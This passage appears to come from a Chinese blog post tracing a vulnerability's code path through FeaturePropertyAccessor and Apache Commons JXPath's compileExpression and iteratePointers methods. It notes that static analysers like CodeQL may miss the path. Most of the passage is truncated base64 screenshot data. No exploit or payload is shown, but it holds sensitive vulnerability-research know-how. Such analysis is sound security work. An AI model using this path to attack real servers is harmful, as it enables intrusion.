wXxLbnn286SQgAFNZs/Y8q3pm/vDdt3zrp6l98uUhJpl0bl+iVtgBgPvfhP0y/kFLe1+6t3FLADX/H3NX5dsOVkzFW4859C03Nfbt312rlAECt7yV0jUyme/hp3cNg0f/q1SOnDddx8SBV7Cr98jPSHAIAtO+k+c3Hwotew4thM9p+cOb1o5Nfln7tYvEaQ3hhLKW7Sn/6jJQQABjp6/F98J2OxJa1Urom75/eUmaf6vzuY4OEAEDmjqPl2/IH/7CuQx9O6MSsOfzNSEXbDm3ZFvlz5NTeiyfamDUKk69SUGrVnzXMTHHmb9HKAM4fmUzthdMTD1XIFQBTG3UpHnj6YK2CEEqt+hMvvfi2cUKpyMyyyS82T19dSDU1j+3fP+cS3cjlBx7VVsjCa0gt+veOHXmr3kAm9wsDANj59H/ujPxpOf7kk28ntOhyxn1fe/m5+hnRtVCNFsbkCsrXJvJ3AECIsT6xBBClNY/9Zr8ubCWr1Xb0pRenL/PUVO/dtatSJ5dPfhItNnNp5BbXsf3G9S+DvpNF4byzZfez+7RyALDof/Xq86cNhFCqrtn7aO0OmYIQam167eVzlQf3y07882TkxIrJeUVd3bnmfdpKmUoDMK9VwCarDbSy6Y1rsaE0RZS/trhAIeKlssZ9TuuV1gs93kjDF/OFAJ5hWrClpjCXlwajw32mlqaugUDk2sxVNZ9dK5ya2D
<p blockindex=35>在这个evaluate()方法里调用了一个get方法accessor是FeaturePropertyAccessor的实例。如果分析漏洞是时候是搜索所有FeaturePropertyAccessor的引用根本没办法搜到CodeQL这类静态分析工具来分析漏洞时就可能会错过</p>
<p blockindex=36>回到get方法</p>
<p blockindex=37><img src="data:image/png;base64,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
<p blockindex=38>这里先获取context然后调用<code>iteratePointers</code>方法,</p>
<p blockindex=39><img src="data:image/png;base64,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
<p blockindex=40>跟进<code>this.compileExpression</code></p>
<p blockindex=41><img src=data:image/png;base64,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
<p blockindex=42>对传入的xpath进行编译,如果前面编译过了,这里直接返回</p>
<p blockindex=43>往下就来到了<code>org.apache.commons.jxpath.ri.compiler.Expression</code>这个类的<code>iteratePointers</code>方法</p>
<p blockindex=44><img src="data:image/png;base64,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